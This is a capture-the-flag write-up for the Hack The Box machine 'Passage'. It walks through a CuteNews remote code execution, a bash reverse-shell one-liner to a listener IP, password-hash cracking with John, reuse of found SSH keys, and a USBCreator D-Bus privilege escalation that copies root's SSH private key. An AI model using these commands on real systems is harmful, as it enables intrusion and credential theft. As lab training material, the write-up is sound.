Hack The Box — Passage
Introduction
Hello there! Thank you for taking the time to read my write up for Passage, from Hack The Box. Passage is a Medium-rated Linux machine that is running a vulnerable version of the CuteNews PHP Management System. Once on the box, the system requires some careful enumeration to find SSH keys that help facilitate lateral movement. The machine finishes up by obtaining a root shell via a USBCreator D-Bus Privilege Escalation vulnerability.
What will be covered
• Nmap
• Remote Code Execution
• JohnTheRipper
• USBCreator D-Bus Privilege Escalation
With that out of the way, let’s jump right in!
Scanning
The first step I take when working on a Hack The Box machine is to run a Nmap scan. This particular scan was run against all 65,535 TCP ports in order to check for services exposed to the Internet. Nmap reveals only two open ports: 22 (SSH), and 80 (HTTP). The scan hints that the system is running Linux and that the title of the HTTP-Title is Passage News. These results can be replicated by running the following command:
sudo nmap -sC -sV -T4 -v -p- -oN nmap/passage.nmap 10.129.209.25
Since there is a web server, that is where I will start.
Web Application
Browsing to the webpage at: http://10.129.209.25, a simple news blog is displayed. One of the first things that I notice about the site is a post. The post states that the site implements Fail2Ban as a protection mechanism against large volumes of traffic. Normally, I would run a directory brute-forcing tool against a site to increase the attack surface. Since directory brute-forcing generates a large amount of traffic against a site, it is made clear that this is not a good idea.
I continued my inspection of the page and noticed something very small at the bottom: “Powered by CuteNews.”
I was unfamiliar with CuteNews, so a quick Google search of “CuteNews Exploit” revealed an Exploit-DB entry for a Remote Code Execution vulnerability with Proof of Concept code available.
I quickly reviewed the source code of the PoC and determined that it was safe to run against the system.
Foothold
I was not 100% sure that this would even work at first. Although it is not a good practice, I tested the vulnerability without first verifying that a vulnerable version was running on the system. Luckily, it worked!
The PoC extracts password hashes, creates a user, and drops into a “shell” where commands can be executed on the system. I added the hashes that were dumped to a file and kept moving. A quick whoami verifies I have RCE!!
Now that I know I can execute commands remotely on the system, it is time to try and get a shell. I re-ran the PoC and executed the following command to get a reverse shell:
bash -c ‘bash -i >& /dev/tcp/10.10.14.29/4445 0>&1’
I was thrilled to see a connection made to my listener! I quickly made some functional upgrades to my reverse shell, and was ready to dive deeper into the box.
At this point, I remembered that I never cracked the hashes I received earlier.
JohnTheRipper
The PoC that I used against this machine extracted SHA-256 hashes in the process of obtaining RCE. As shown in the screenshot below, the hashes can be cracked using either JohnTheRipper or Hashcat. I chose to go with John in this situation.
John paired with rockyou.txt and a raw-sha256 format turned up a single password within seconds. The command used to crack the passwords is as follows:
john — format=raw-sha256 -w=/usr/share/wordlists/rockyou.txt
Now that I have a password its time to try it all across the machine to check for validity.
Lateral Movement
One of the first things I normally check after getting a shell on a box is the /home directory. Generally speaking, this is where the user.txt flag will be located. There are two users that have home directories: Nadav and Paul. I first try the password by trying to switch to the Nadav user, with no success. Next, I try Paul and get logged in!
user.txt
Changing into Paul’s home directory reveals the user.txt file. At this point I have the ability to collect the flag and complete part one of the challenge.
Since there is another user that is on the box, I know that I need to gain access as that user in order to keep moving forward.
Lateral Movement
Some light enumeration in Paul’s home directory turns up something that is very interesting. There are SSH keys located in the .ssh directory that have been generated for Nadav!
I quickly try to SSH as Nadav using the key locally and sure enough, I get logged in!
Now that I have obtained the second user, it is time to try and escalate to root.
Privilege Escalation
One of the first steps I take when attempting to perform privilege escalation on a Linux machine is to upload linpeas.sh to the /tmp directory in order to automate the enumeration process. After uploading the script via wget I then run the script.
One of the things that I like the most about LinPEAS is that it outputs all of the enumeration results in an easy to understand format. After reviewing the output initially, nothing truly stood out as a privilege escalation vector. I got to the SUID portion and started Googling.
I didn’t get very far down the list when I discovered a potential privilege escalation path. It appears that the system is running a vulnerable version of the USBCreator D-Bus interface. I have linked the reference below for more information on the technique used.
It took a lot of playing around to finally accomplish my end goal, which is to extract root’s SSH keys. The command used to accomplish this task can be seen below:
gdbus call — system — dest com.ubuntu.USBCreator — object-path /com/ubuntu/USBCreator — method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id true
As shown in the screenshot below, I was able to gain access to root’s SSH key.
At this point, I am able to SSH as the root user locally on the system!
root.txt
To finish things up, I gain the root.txt flag and complete the challenge!
Conclusion
Overall this was a very fun and interesting box to complete. If you have made it this far, thank you for taking the time to read this write up! As always, stay tuned for more!